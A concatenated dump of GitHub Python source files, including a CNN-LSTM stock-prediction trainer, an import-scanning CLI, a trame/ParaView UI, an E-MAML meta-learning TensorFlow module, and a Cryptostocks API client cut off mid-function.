self._opt.step()\n tm_loss.append(loss.item())\n if step % 150 == 0:\n print(f\"[{epoch + 1}/{epochs}] Epoch | Loss:{tm_loss[-1]}\")\n step += 1\n\n # self._scheduler.step()\n total_loss.append(np.mean(tm_loss))\n\n # start validation process\n for idx, (x, y) in enumerate(validation_loader):\n x = torch.transpose(x, dim0=1, dim1=2)\n\n # x_mean = torch.mean(x)\n # y_mean = torch.mean(y)\n #\n # x_std = torch.std(x)\n # y_std = torch.std(y)\n #\n # x = (x-x_mean)/x_std\n # y = (y-y_mean)/y_std\n\n if has_cuda:\n x = x.float().cuda()\n y = y.float().cuda()\n\n with torch.no_grad():\n pred = self._model(x)\n # pred = pred * std + mean\n # y = y * std + mean\n loss = self._criterion(pred, y)\n tm_val_loss.append(loss.item())\n total_val_loss.append(np.mean(tm_val_loss))\n print(f\"[{epoch + 1}/{epochs}] Epoch | Validation Loss:{np.array(total_val_loss).mean()}\")\n # end validation process\n\n # end update\n\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\n # start saving weights\n total_loss = np.array(total_loss)\n total_val_loss = np.array(total_val_loss)\n total_loss = 1 - total_loss if self._criterion_name == \"RLoss\" else total_loss\n total_val_loss = 1 - total_val_loss if self._criterion_name == \"RLoss\" else total_val_loss\n\n np.save(file=str(save_path.joinpath(\"train_loss.npy\")), arr=total_loss)\n np.save(file=str(save_path.joinpath(\"validation_loss.npy\")), arr=total_val_loss)\n torch.save(self._model.state_dict(), str(save_path.joinpath(\"model.pth\")))\n # end saving weights\n\n # start save loss plot\n plt.figure(figsize=(15, 9))\n plt.plot(np.arange(epochs) + 1, total_loss, color=colors[0], label=\"Train loss\")\n plt.plot(np.arange(epochs) + 1, total_val_loss, color=colors[1], label=\"Validation loss\")\n plt.title(f\"CNN-LSTM ({self._criterion_name})\", fontsize=18, fontweight='bold')\n plt.xlabel('epochs', fontsize=18)\n plt.ylabel('Loss', fontsize=18)\n plt.legend()\n plt.savefig(str(save_path.joinpath(\"plot\").joinpath(\"training_loss.png\")))\n # end save loss plot\n\n # start test\n\n test_loss = []\n val_pred = []\n val_true = []\n with torch.no_grad():\n for idx, (x, y) in enumerate(test_loader):\n x = torch.transpose(x, dim0=1, dim1=2)\n\n # x_mean = torch.mean(x)\n # y_mean = torch.mean(y)\n #\n # x_std = torch.std(x)\n # y_std = torch.std(y)\n #\n # x = (x-x_mean)/x_std\n # y = (y-y_mean)/y_std\n\n if has_cuda:\n x = x.float().cuda()\n y = y.float().cuda()\n\n # # update\n pred = self._model(x)\n pred = pred * std + mean\n y = y * std + mean\n loss = self._criterion(pred, y)\n\n val_pred.append(pred.cpu().numpy())\n val_true.append(y.cpu().numpy())\n test_loss.append(loss.item())\n\n val_pred = np.concatenate(val_pred, axis=0)\n val_true = np.concatenate(val_true, axis=0)\n\n val_pred = np.squeeze(val_pred, axis=-1)\n val_true = np.squeeze(val_true, axis=-1)\n\n # val_pred = np.squeeze(val_pred , axis=-1)\n # val_true = np.squeeze(val_true, axis=-1)\n\n test_loss_mean = np.array(test_loss).mean()\n test_loss_mean = 1 - test_loss_mean if self._criterion_name == \"RLoss\" else test_loss_mean\n\n s_val_pred = np.array(val_pred)\n s_val_true = np.array(val_true)\n\n np.save(str(save_path.joinpath(\"train_pred.npy\")), s_val_pred)\n np.save(str(save_path.joinpath(\"train_true.npy\")), s_val_true)\n\n predict = pd.DataFrame(val_pred)\n original = pd.DataFrame(val_true)\n\n # start save prediction\n plt.figure(figsize=(15, 9))\n ax = sns.lineplot(x=original.index, y=original[0], label=\"Data\", color='royalblue')\n ax = sns.lineplot(x=predict.index, y=predict[0], label=f\"Prediction\", color='tomato')\n ax.set_title(f'Test Stock price (Test loss: {test_loss_mean})', size=14, fontweight='bold')\n ax.set_xlabel(\"Days\", size=14)\n ax.set_ylabel(\"Cost (USD)\", size=14)\n ax.set_xticklabels('', size=10)\n\n plt.savefig(str(save_path.joinpath(\"plot\").joinpath(\"prediction.png\")))\n # end save loss plot\n\n # end test\n print(f\"[Test] Final Test Loss: {test_loss_mean}\")\n","repo_name":"armin-azh/CNN-LSTM","sub_path":"core/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"29519063397","text":"\"\"\"Integration tests.\"\"\"\n\nimport requests\n\nfrom tests.integration.consts import api\n\n\ndef test_get_hello():\n \"\"\"Get Hello Endpoint.\"\"\"\n response = requests.get(api.HEALTH_CHECK)\n assert response.status_code == 200, '\\nReason: {}\\nURL: {}'.format(\n response.reason, response.url)\n response_body = response.json()\n\n assert 'status' in response_body\n assert 'ok' in response_body['status']\n","repo_name":"rpapat/ows-myproduct","sub_path":"tests/integration/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9772626021","text":"\"\"\"Utilities to scan all Python files in a directory and\naggregate the names of all the imported packages\n\"\"\"\nimport argparse\nimport ast\nimport os\nfrom collections import Counter\nfrom typing import Dict, Iterable, List, Optional, Tuple\n\nfrom iscan.std_lib import separate_third_party_from_std_lib\n\n\nclass ImportScanner(ast.NodeVisitor):\n \"\"\"Scanner to look for imported packages.\"\"\"\n def __init__(self) -> None:\n self.imports = [] # type: ignore\n\n def visit_Import(self, node: ast.Import) -> None:\n \"\"\"Extract imports of the form `import foo`.\n\n >>> import_statement = 'import os.path.join as jn, datetime.datetime as dt'\n >>> ast.dump(ast.parse(import_statement))\n \"Module(body=[\n Import(names=[alias(name='os.path.join', asname='jn'),\n alias(name='datetime.datetime', asname='dt')])\n ])\"\n \"\"\"\n for alias in node.names:\n self.imports.append(alias.name)\n self.generic_visit(node)\n\n def visit_ImportFrom(self, node: ast.ImportFrom) -> None:\n \"\"\"Extract imports of the form `from foo import bar`.\n\n Relative imports such as `from ..utils import foo` will be ignored.\n\n >>> import_statement = 'from os.path import join as jn, split'\n >>> ast.dump(ast.parse(import_statement))\n \"Module(body=[\n ImportFrom(module='os.path',\n names=[alias(name='join', asname='jn'),\n alias(name='split', asname=None)],\n level=0)\n ])\"\n \"\"\"\n # Ignore relative imports, for which node.level > 0\n # E.g., `from ..utils import foo` has a node.level of 2\n if node.level == 0:\n self.imports.append(node.module)\n self.generic_visit(node)\n\n def get_imports(self) -> List[str]:\n return sorted(self.imports)\n\n\ndef convert_source_to_tree(fpath: str) -> ast.Module:\n \"\"\"Convert source code into abstract syntax tree.\n\n Args:\n fpath: Path to the Python file of interest\n\n Returns:\n AST representation of the source code\n \"\"\"\n with open(fpath, 'r') as f:\n tree = ast.parse(f.read())\n return tree\n\n\ndef scan_directory(dir_to_scan: str, dir_to_exclude: Optional[str] = None) -> List[str]:\n \"\"\"Extract packages imported across all Python files in a directory.\n\n Args:\n dir_to_scan: Path to the directory of interest\n dir_to_exclude: Path to the directory to be excluded during scanning\n\n Returns:\n Imported packages; might contain duplicates\n \"\"\"\n all_imports = []\n for root_dir, _, fnames in os.walk(top=dir_to_scan):\n # Skip excluded directory\n if dir_to_exclude is not None:\n if os.path.abspath(dir_to_exclude) in os.path.abspath(root_dir):\n continue\n\n for fname in fnames:\n # Skip non-Python files\n if not fname.endswith('.py'):\n continue\n\n # Convert source code into tree\n fpath = os.path.join(root_dir, fname)\n tree = convert_source_to_tree(fpath)\n\n # Extract imports for current file\n scanner = ImportScanner()\n scanner.visit(tree)\n all_imports.extend(scanner.get_imports())\n\n return all_imports\n\n\ndef get_base_name(full_name: str) -> str:\n \"\"\"Extract the base name of a package.\n\n Args:\n full_name: Full name of the package of interest, e.g., pandas.testing\n\n Returns:\n Base name of the provided package, e.g., pandas\n \"\"\"\n return full_name.split('.')[0]\n\n\ndef sort_counter(counter: Counter, alphabetical: bool) -> Dict[str, int]:\n \"\"\"Sort counter according to custom logic.\n\n Args:\n counter: Imported packages and their corresponding count\n alphabetical: Whether to sort counter alphabetically\n\n Returns:\n Sorted counter\n \"\"\"\n def custom_order(tup):\n # Sort first by count (descending), and then by name\n return -tup[1], tup[0]\n\n sort_key = None if alphabetical else custom_order\n return dict(sorted(counter.items(), key=sort_key))\n\n\ndef show_result(third_party: Dict[str, int], std_lib: Dict[str, int], ignore_std_lib: bool) -> None:\n \"\"\"Print the result of running iscan.\n\n Args:\n third_party: Imported third-party packages and count\n std_lib: Imported standard library modules and count\n ignore_std_lib: Whether to omit standard library modules in the output\n \"\"\"\n result = '''\n--------------------------\n Third-party packages\n--------------------------\nNAME COUNT\n'''\n for name, count in third_party.items():\n result += f'{name:<20} {count:>5}\\n'\n\n if not ignore_std_lib:\n result += '''\n--------------------------\n Standard library modules\n--------------------------\nNAME COUNT\n'''\n for name, count in std_lib.items():\n result += f'{name:<20} {count:>5}\\n'\n\n print(result)\n\n\ndef run(dir_to_scan: str, dir_to_exclude: Optional[str] = None) -> Tuple[Counter, Counter]:\n \"\"\"Run iscan for a given set of parameters.\n\n Args:\n dir_to_scan: Path to the directory of interest\n dir_to_exclude: Path to the directory to be excluded during scanning\n\n Returns:\n Imported third-party packages and count\n Imported standard library modules and count\n \"\"\"\n full_packages = scan_directory(dir_to_scan, dir_to_exclude)\n base_packages = map(get_base_name, full_packages)\n third_party, std_lib = separate_third_party_from_std_lib(base_packages)\n return Counter(third_party), Counter(std_lib)\n\n\ndef cli() -> argparse.Namespace:\n \"\"\"Command line interface.\"\"\"\n parser = argparse.ArgumentParser(\n allow_abbrev=False,\n description='Aggregate third-party packages and standard library modules imported across all Python files in a given directory.' # noqa: E501\n )\n parser.add_argument(\n 'DIR_TO_SCAN',\n help='target directory to scan'\n )\n parser.add_argument(\n '-x',\n default=None,\n dest='DIR_TO_EXCLUDE',\n help='directory to exclude during scanning'\n )\n parser.add_argument(\n '--ignore-std-lib',\n dest='IGNORE_STD_LIB',\n action='store_const',\n const=True,\n default=False,\n help='whether to leave standard library modules out of the report'\n )\n parser.add_argument(\n '--alphabetical',\n dest='ALPHABETICAL',\n action='store_const',\n const=True,\n default=False,\n help='whether to sort the report alphabetically'\n )\n return parser.parse_args()\n\n\ndef main() -> None:\n args = cli()\n third_party, std_lib = run(args.DIR_TO_SCAN, args.DIR_TO_EXCLUDE)\n third_party = sort_counter(third_party, args.ALPHABETICAL) # type: ignore\n std_lib = sort_counter(std_lib, args.ALPHABETICAL) # type: ignore\n show_result(third_party, std_lib, args.IGNORE_STD_LIB)\n","repo_name":"zzhengnan/iscan","sub_path":"iscan/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42454861","text":"from paraview import simple\n\nfrom trame.ui.vuetify import SinglePageWithDrawerLayout\nfrom trame.widgets import paraview, vuetify\n\n\ndef initialize(server):\n view = simple.GetRenderView()\n window = view.GetRenderWindow()\n\n if window:\n # Hide the render window\n window.OffScreenRenderingOn()\n\n state, ctrl = server.state, server.controller\n state.trame__title = \"Trame Tomo\"\n\n with SinglePageWithDrawerLayout(server) as layout:\n # Toolbar\n layout.title.set_text(\"Trame Tomo\")\n with layout.toolbar:\n with vuetify.VBtn(\n icon=True, click=ctrl.open_file, small=True, classes=\"mx-4\"\n ):\n vuetify.VIcon(\"mdi-folder-file-outline\")\n\n vuetify.VSpacer()\n with vuetify.VBtn(icon=True, click=ctrl.reset_camera):\n vuetify.VIcon(\"mdi-crop-free\")\n\n with layout.drawer as drawer:\n drawer.width = 400\n state.opacities = {\n 'points': [0, 0, 1, 1],\n 'gaussians': [],\n }\n with vuetify.VCard():\n with vuetify.VCardText(style='height: 400px;') as content:\n content.add_child(f\"\"\"\n \n \"\"\")\n\n # Main content\n with layout.content:\n with vuetify.VContainer(fluid=True, classes=\"pa-0 fill-height\"):\n html_view = paraview.VtkRemoteView(view, ref=\"view\")\n ctrl.reset_camera = html_view.reset_camera\n ctrl.view_update = html_view.update\n\n # Prevent selection/highlighting\n layout.root.style = \"user-select: none;\"\n","repo_name":"psavery/trame-tomo","sub_path":"trame_tomo/app/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26839045876","text":"\"\"\"stands for 'correction-MAML. Could also argue complete-maml. Whatever.\"\"\"\nfrom collections import Sequence\nfrom numbers import Number\nfrom typing import Any\n\nimport matplotlib\nfrom tqdm import trange\nimport tensorflow as tf\n\nfrom e_maml_tf.ge_utils import get_scope_name, stem\nfrom .config import G\nfrom e_maml_tf.algos.vpg import Inputs as VPGInputs, VPG, Optimize as VPG_Optimize\nfrom e_maml_tf.algos.ppo2 import Inputs as PPOInputs, PPO, Optimize as PPO_Optimize\nfrom e_maml_tf.algos.cpi import Inputs as CPIInputs, CPI, Optimize as CPI_Optimize\nfrom e_maml_tf.algos.bc import Inputs as BCInputs, BC, Optimize as BC_Optimize\nfrom e_maml_tf.algos.bc_learned_loss import Inputs as BCLearnedLossInputs, BCLearnedLoss\nfrom .ge_utils import defaultlist, make_with_custom_variables, GradientSum, Cache, var_map\n\nmatplotlib.use(\"Agg\")\n\nimport baselines.common.tf_util as U\nfrom .ge_policies import MlpPolicy\n\nALLOWED_ALGS = ('VPG', 'PPO', 'CPI', \"BC\", \"BCLearnedLoss\")\n\n\nclass Meta:\n optim = None\n\n def __init__(self, *, scope_name, act_space, ob_shape, algo, reuse: Any = False, trainables=None, optimizer=None,\n add_loss=None, loss_only=False, lr_rank=None, max_grad_norm=None, max_grad_clip=None,\n fix_variance=False):\n \"\"\"\n Meta Graph Constructor\n\n :param scope_name:\n :param act_space:\n :param ob_shape:\n :param algo:\n :param reuse:\n :param trainables:\n :param optimizer:\n :param lr_rank: One of [None, 0, 1, 2] corresponding to [(), 'scalar', 'simple', \"full\"] learned learning rate.\n :param max_grad_norm:\n :param max_grad_clip:\n :param fix_variance:\n \"\"\"\n assert algo in ALLOWED_ALGS, \"model algorithm need to be one of {}\".format(ALLOWED_ALGS)\n with tf.variable_scope(scope_name, reuse=reuse):\n obs = tf.placeholder(dtype=tf.float32, shape=ob_shape, name='obs') # obs\n if algo == \"PPO\":\n self.inputs = inputs = PPOInputs(action_space=act_space, value_baseline=(G.baseline == \"critic\"))\n Optimize = PPO_Optimize\n elif algo == \"VPG\":\n self.inputs = inputs = VPGInputs(action_space=act_space, value_baseline=(G.baseline == \"critic\"))\n Optimize = VPG_Optimize\n elif algo == \"CPI\":\n self.inputs = inputs = CPIInputs(action_space=act_space, value_baseline=(G.baseline == \"critic\"))\n Optimize = CPI_Optimize\n elif algo == \"BC\":\n self.inputs = inputs = BCInputs(action_space=act_space)\n Optimize = BC_Optimize\n elif algo == \"BCLearnedLoss\":\n self.inputs = inputs = BCLearnedLossInputs(action_space=act_space, type=G.learned_loss_type)\n Optimize = BC_Optimize\n else:\n raise NotImplementedError(\n 'Only supports PPO, VPG, CPI, BC and BC with Learned Loss (BCLearnedLoss)')\n inputs.X = obs # https://github.com/tianheyu927/mil/blob/master/mil.py#L218\n bias_transformation = tf.get_variable('input_bias', [1, G.bias_dim], initializer=tf.zeros_initializer())\n batch_n = tf.shape(obs)[0]\n trans_input = tf.tile(bias_transformation, [batch_n, 1])\n self.policy = policy = MlpPolicy(\n ac_space=act_space, hidden_size=G.hidden_size, n_layers=G.n_layers,\n activation=G.activation, value_baseline=(G.baseline == \"critic\"),\n reuse=reuse, X=tf.concat(values=(obs, trans_input), axis=1), X_placeholder=obs,\n init_logstd=G.init_logstd, fix_variance=fix_variance)\n\n # note that policy.trainables are the original trainable parameters, not the mocked variables.\n # todo: concatenate policy.trainable with local trainable (bias_transformation)\n self.trainables = tf.trainable_variables() if trainables is None else trainables\n\n ext_loss = add_loss(inputs.ADV) if callable(add_loss) else None\n if algo == \"PPO\":\n self.model = PPO(inputs=inputs, policy=policy, vf_coef=G.vf_coef, ent_coef=G.ent_coef)\n elif algo == \"VPG\":\n self.model = VPG(inputs=inputs, policy=policy, vf_coef=G.vf_coef)\n elif algo == \"CPI\":\n self.model = CPI(inputs=inputs, policy=policy, vf_coef=G.vf_coef, ent_coef=G.ent_coef)\n elif algo == \"BC\":\n self.model = BC(inputs=inputs, policy=policy)\n elif algo == \"BCLearnedLoss\":\n self.model = BCLearnedLoss(inputs=inputs, policy=policy, type=G.learned_loss_type)\n\n self.loss = self.model.loss if ext_loss is None else (self.model.loss + ext_loss)\n\n if not loss_only:\n if lr_rank == 0:\n inputs.LR = lr = tf.placeholder(tf.float32, shape=[], name=\"LR\")\n elif lr_rank == 1:\n inputs.LR = lr = tf.placeholder(tf.float32, shape=(len(self.trainables),), name=\"LR\")\n elif lr_rank == 2:\n inputs.LR = lr = [tf.placeholder(tf.float32, shape=t.shape, name=f\"LR_{stem(t, 2)}\")\n for t in self.trainables]\n elif lr_rank is None:\n lr = None\n else:\n raise NotImplementedError(f\"lr_rank = {lr_rank} is not supported. Check for programming error.\")\n self.optim = Optimize(lr=lr, loss=self.loss, reports=self.model.reports,\n trainables=self.trainables, max_grad_norm=max_grad_norm,\n max_grad_clip=max_grad_clip, optimizer=optimizer)\n\n\ndef _mean(x, axis=None, keepdims=False):\n return tf.reduce_mean(x, reduction_indices=None if axis is None else [axis], keep_dims=keepdims)\n\n\ndef cmaml_loss(neglogpacs, advantage):\n mean_adv = _mean(advantage)\n # we attribute adv to all workers in the style of DICE\n exploration_term = _mean(neglogpacs) * mean_adv\n return exploration_term * G.e_maml_lambda\n\n\nclass SingleTask:\n def __init__(self, act_space, ob_shape, trainable_map, meta_trainable_map=None, lr=None):\n # no need to go beyond despite of large G.eval_grad_steps, b/c RL samples using runner policy.\n\n if meta_trainable_map is None:\n meta_trainable_map = trainable_map\n\n self.workers = defaultlist(None)\n self.metas = defaultlist(None)\n\n params = defaultlist(None)\n params[0] = meta_trainable_map.copy()\n params[0].update(trainable_map)\n\n import gym\n assert type(act_space) is gym.spaces.Box\n act_dim, *_ = act_space.shape\n\n for k in range(G.n_grad_steps + 1):\n if k < G.n_grad_steps: # 0 - 9,\n\n self.workers[k] = worker = make_with_custom_variables(\n lambda: Meta(scope_name=f'inner_{k}_grad_network',\n act_space=act_space, ob_shape=ob_shape, algo=G.inner_alg,\n # do NOT pass in learning rate to inhibit the Meta.optimize operator.\n optimizer=G.inner_optimizer, reuse=True, trainables=list(params[k].values()),\n max_grad_norm=G.inner_max_grad_norm, max_grad_clip=G.inner_max_grad_clip,\n fix_variance=True\n ), # pass in the trainable_map for proper gradient\n params[k], f'{get_scope_name()}/inner_{k}_grad_network/'\n )\n\n with tf.variable_scope(f'SGD_grad_{k}'):\n if (isinstance(lr, Sequence) and len(lr)) or (hasattr(lr, 'shape') and len(lr.shape)):\n learn_rates = lr[k]\n else:\n worker.inputs.LR = lr # this is important because this is needed by the feed_dict\n learn_rates = [lr] * len(worker.optim.grads)\n params[k + 1] = meta_trainable_map.copy()\n if G.first_order:\n params[k + 1].update({k: worker.optim.apply_grad(lr=lr, grad=tf.stop_gradient(g), var=v)\n for g, lr, (k, v) in\n zip(learn_rates, worker.optim.grads, params[k].items())})\n else:\n params[k + 1].update({k: worker.optim.apply_grad(lr=lr, grad=g, var=v)\n for g, lr, (k, v) in\n zip(learn_rates, worker.optim.grads, params[k].items())})\n\n if k == G.n_grad_steps: # 10 or 1.\n add_loss = None if G.run_mode != 'e-maml' \\\n else lambda ADV: cmaml_loss([w.model.neglogpac for w in self.workers], ADV)\n self.meta = make_with_custom_variables(\n lambda: Meta(scope_name=\"meta_network\", act_space=act_space, ob_shape=ob_shape,\n algo=G.meta_alg, reuse=True, add_loss=add_loss, loss_only=True, )\n , params[k], f'{get_scope_name()}/meta_network/'\n )\n\n # Expose as non-public API for debugging purposes\n self._params = params\n\n\ndef assert_match(l1, l2):\n assert len(l1) > 0\n for i, (a, b) in enumerate(zip(l1, l2)):\n assert a == b, \"existing items has to be the same.\"\n return l1[i + 1:] if len(l1) > len(l2) else l2[i + 1:]\n\n\n# Algorithm Summary\n# 1. [sample] with pi(theta) `run_episode`\n# 2. compute policy gradient (vanilla)\n# 3. apply gradient to get \\theta' using SGD\n# 4. [sample] with pi(theta') `run_episode`\n# 5. use PPO, compute meta gradient\n# 6. sum up the PPO gradient from multiple tasks and average\n# 6. apply this gradient\nclass E_MAML:\n gradient_sum = None\n alpha = None\n\n def __init__(self, ob_space, act_space):\n \"\"\"\n Usage:\n self.env = env\n ob_shape = (None,) + self.env.observation_space.shape\n \"\"\"\n from ml_logger import logger\n logger.upload_file(__file__)\n\n ob_shape = (None,) + ob_space.shape\n\n import gym\n assert type(act_space) is gym.spaces.Box\n act_dim, *_ = act_space.shape\n\n if G.meta_sgd == 'full':\n lr_rank = 2\n elif G.meta_sgd:\n lr_rank = 1\n else:\n lr_rank = 0\n # Meta holds policy, inner optimizer. Also creates an input.LR placeholder.\n self.runner = Meta(scope_name='runner', act_space=act_space, ob_shape=ob_shape, algo=G.inner_alg,\n lr_rank=lr_rank, optimizer=G.inner_optimizer, max_grad_norm=G.inner_max_grad_norm,\n max_grad_clip=G.inner_max_grad_clip, fix_variance=G.control_variance)\n\n trainables = self.runner.trainables\n runner_var_map = var_map(trainables, 'runner/')\n # note: the point of AUTO_REUSE is:\n # note: if reuse=True, gives error when no prior is available. Otherwise always creates new.\n # note: This yaw, only creates new when old is not available.\n self.meta_runner = Meta(scope_name=\"runner\", act_space=act_space, ob_shape=ob_shape, algo=G.meta_alg,\n reuse=tf.AUTO_REUSE, loss_only=True, fix_variance=G.fix_meta_variance)\n meta_trainables = self.meta_runner.trainables\n meta_runner_var_map = var_map(meta_trainables, 'runner/')\n # meta_trainables = assert_match(trainables, meta_trainables)\n\n self.beta = tf.placeholder(tf.float32, [], name=\"beta\")\n\n print(\">>>>>>>>>>> Constructing Meta Graph <<<<<<<<<<<\")\n # todo: we can do multi-GPU placement of the graph here.\n self.graphs = []\n assert G.n_graphs == 1 or G.n_graphs == G.n_tasks, \"graph number is 1 or equal to the number of tasks\"\n\n if G.meta_sgd:\n assert isinstance(G.alpha, Number), \"alpha need to be a scalar.\"\n self.alpha = [] # has to be per-layer per-block. Bias and weights require different scales.\n for k in range(G.n_grad_steps):\n with tf.variable_scope(f'learned_alpha_{k}'):\n self.alpha.append([\n tf.get_variable(f'alpha_{stem(t.name, 2)}', shape=t.shape if G.meta_sgd == \"full\" else (),\n initializer=tf.constant_initializer(G.alpha))\n for t in trainables\n ])\n else:\n self.alpha = self.runner.inputs.LR\n for t in trange(G.n_graphs):\n with tf.variable_scope(f\"graph_{t}\"):\n # note: should use different learning rate for each gradient step\n task_graph = SingleTask(act_space=act_space, ob_shape=ob_shape, trainable_map=runner_var_map,\n meta_trainable_map=meta_runner_var_map, lr=self.alpha)\n self.graphs.append(task_graph)\n\n all_trainables = tf.trainable_variables() # might be controlled variables in the meta loop\n\n # Only do this after the meta graph has finished using policy.trainables\n # Note: stateful operators for saving to a cache and loading from it. Only used to reset runner\n # Note: Slots are not supported. Only weights.\n # fixit: all_variables might not be needed. Only that of the runner need to be cached.\n with tf.variable_scope(\"weight_cache\"):\n self.cache = Cache(all_trainables)\n self.save_weight_cache = U.function([], [self.cache.save])\n self.load_weight_cache = U.function([], [self.cache.load])\n\n # Now construct the meta optimizers\n with tf.variable_scope('meta_optimizer'):\n # call gradient_sum.set_op first, then add_op. Call k times in-total.\n self.meta_grads = tf.gradients(tf.reduce_mean([task_graph.meta.loss for task_graph in self.graphs]),\n all_trainables)\n if G.n_graphs == 1:\n self.gradient_sum = GradientSum(all_trainables, self.meta_grads)\n grads = [c / G.n_tasks for c in self.gradient_sum.cache]\n else:\n grads = self.meta_grads\n\n if G.meta_max_grad_norm: # allow 0 to be by-pass\n grads = [None if g is None else\n g * tf.stop_gradient(G.meta_max_grad_norm / tf.maximum(G.meta_max_grad_norm, tf.norm(g)))\n for g in grads]\n\n # do NOT apply gradient norm here.\n if G.meta_optimizer == \"Adam\":\n Optim, kwargs = tf.train.AdamOptimizer, {}\n elif G.meta_optimizer == \"AdamW\":\n Optim, kwargs = tf.contrib.opt.AdamWOptimizer, dict(weight_decay=0.0001)\n elif G.meta_optimizer == \"SGD\":\n Optim, kwargs = tf.train.GradientDescentOptimizer, {}\n else:\n raise NotImplemented(f\"{G.meta_optimizer} as a meta optimizer is not implemented.\")\n\n # Uses a different optimizer (with slots) for each step in the meta update.\n self.meta_update_ops = defaultlist(None)\n self.meta_optimizers = defaultlist(None)\n for i in range(1 if G.reuse_meta_optimizer else G.meta_n_grad_steps):\n self.meta_optimizers[i] = Optim(learning_rate=self.beta, **kwargs)\n self.meta_update_ops[i] = self.meta_optimizers[i].apply_gradients(zip(grads, all_trainables))\n\n self.meta_reporting_keys = self.graphs[0].meta.model.reports.keys()\n self.meta_reporting = self.graphs[0].meta.model.reports.values() if G.n_graphs == 1 else \\\n [tf.reduce_mean(_) for _ in zip(*[graph.meta.model.reports.values() for graph in self.graphs])]\n","repo_name":"geyang/e-maml","sub_path":"e_maml_tf/e_maml_ge.py","file_name":"e_maml_ge.py","file_ext":"py","file_size_in_byte":15839,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"70780173288","text":"import os\nimport argparse\n#import urllib2\nfrom urlparse import urljoin\nimport requests\n\nimport json\nimport pandas as pd\nimport numpy as np\n#import dateutil.parser\nimport datetime\nimport pytz\n\nclass API_Request:\n def __init__(self, base_path, api_url, values={}, api_type='json', flag_download=True):\n self.flag_download = flag_download\n \n self.api_type = api_type\n \n self.api_url = api_url\n self.short_filename = api_url #.replace('/','_')\n\n self.values = values\n \n self.base_path = base_path \n \n self.api_base_url = \"https://cryptostocks.com/api/\"\n\n def update(self):\n self.get_data()\n self.convert_to_DataFrame()\n self.calculate()\n\n def get_data(self):\n self.filename = os.path.join(self.base_path, \"data_in/{api_url}{dict_val}.{api_type}\".format(api_url=self.short_filename, dict_val=self.dict2str(self.values) ,api_type=self.api_type))\n\n if self.flag_download:\n self.download()\n self.write_data()\n else:\n self.read_data()\n\n def download(self):\n self.url = urljoin(self.api_base_url, self.api_url)\n self.url = self.url + '.' + self.api_type\n print(\"Downloading {api_url} from {url} (please wait)\".format(api_url=self.api_url, url=self.url))\n print(\" parameters= {d}\".format(d=self.values))\n \n #req = requests.get(self.url, params=self.values)\n req = requests.get(self.url, params=self.values, verify=False)\n # to fix requests.exceptions.SSLError: [Errno 1] _ssl.c:504: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed\n \n self.raw_data = req.content\n \n if self.api_type=='json':\n self.data = json.loads(self.raw_data)\n else:\n raise(Exception(\"Undefined API type\"))\n \n def write_data(self):\n print(\"Writing {api_url} to {filename}\".format(api_url=self.api_url, filename=self.filename))\n myFile = open(self.filename, 'w')\n myFile.write(self.raw_data)\n myFile.close()\n\n def read_data(self):\n print(\"Reading {api_url} from {filename}\".format(api_url=self.api_url, filename=self.filename))\n myFile = open(self.filename, 'r')\n self.raw_data = myFile.read()\n self.data = json.loads(self.raw_data)\n myFile.close()\n\n def dict2str(self, d):\n str = ''\n for (key, value) in d.iteritems():\n #str = str + '_' + key + '-' + value\n str = str + '-' + key + '_' + value\n return(str)\n\n def pretty_print(self):\n if self.api_type=='json':\n print(json.dumps(self.data, sort_keys=True, indent=2))\n else:\n raise(Exception(\"Undefined API type\"))\n\n def convert_to_DataFrame(self):\n pass\n\n def calculate(self):\n pass\n\n def to_excel(self):\n filename = os.path.join(self.base_path, \"data_out/{api_url}{dict_val}.xls\".format(api_url=self.short_filename, dict_val=self.dict2str(self.values)))\n self.df.to_excel(filename)\n\nclass API_Request_get_security_info(API_Request):\n def __init__(self, base_path, ticker, api_type='json', flag_download=True):\n api_url = 'get_security_info'\n values = {'ticker': ticker}\n \n API_Request.__init__(self, args.basepath, api_url, values, api_type='json', flag_download=flag_download)\n\nclass API_Request_get_dividend_for_security(API_Request):\n def __init__(self, base_path, ticker, days=30, daysoffset=0, api_type='json', flag_download=True):\n api_url = 'get_dividend_for_security'\n #values = {'ticker': ticker, 'days': str(days)}\n values = {'ticker': ticker, 'after_id': str(-1)} # to get all dividend\n\n self.ticker = ticker\n self.days = days\n self.daysoffset = daysoffset\n \n API_Request.__init__(self, args.basepath, api_url, values, api_type='json', flag_download=flag_download)\n\n def convert_to_DataFrame(self):\n if self.data['return_code']==0:\n try:\n if len(self.data['dividends'])>0:\n self.df = pd.DataFrame(self.data['dividends'])\n else:\n self.df = pd.DataFrame(columns=['dividend_per_share', 'id', 'number_shares', 'timestamp'])\n except:\n raise(Exception(\"Can't convert get_dividend to DataFrame\"))\n else:\n raise(Exception(\"return_code!=0\"))\n\n # convert unicode to float\n self.df['dividend_per_share'] = self.df['dividend_per_share'].astype(float)\n \n #self.df['timestamp'] = self.df['timestamp'].map(lambda s: dateutil.parser.parse(s))\n #self.df['timestamp'] = self.df['timestamp'].map(lambda s: datetime.datetime.fromtimestamp(int(s), tz=pytz.UTC)) #convert timestamp to datetime\n self.df['timestamp'] = pd.to_datetime(self.df['timestamp'])\n\n # filter to keep only dividend from now - daysoffset to now - days - daysoffset\n #dtnow = datetime.datetime.now().replace(tzinfo=pytz.UTC)\n dtnow = datetime.datetime.utcnow()\n dt2 = dtnow - datetime.timedelta(days=self.daysoffset)\n dt1 = dt2 - datetime.timedelta(days=self.days)\n print(\"dividends from {dt1} to {dt2}\".format(dt1=dt1, dt2=dt2))\n self.df = self.df[(self.df['timestamp']>=dt1) & (self.df['timestamp']<=dt2)]\n\n def calculate(self):\n self.df['total_dividend'] = self.df['dividend_per_share'] * self.df['number_shares']\n 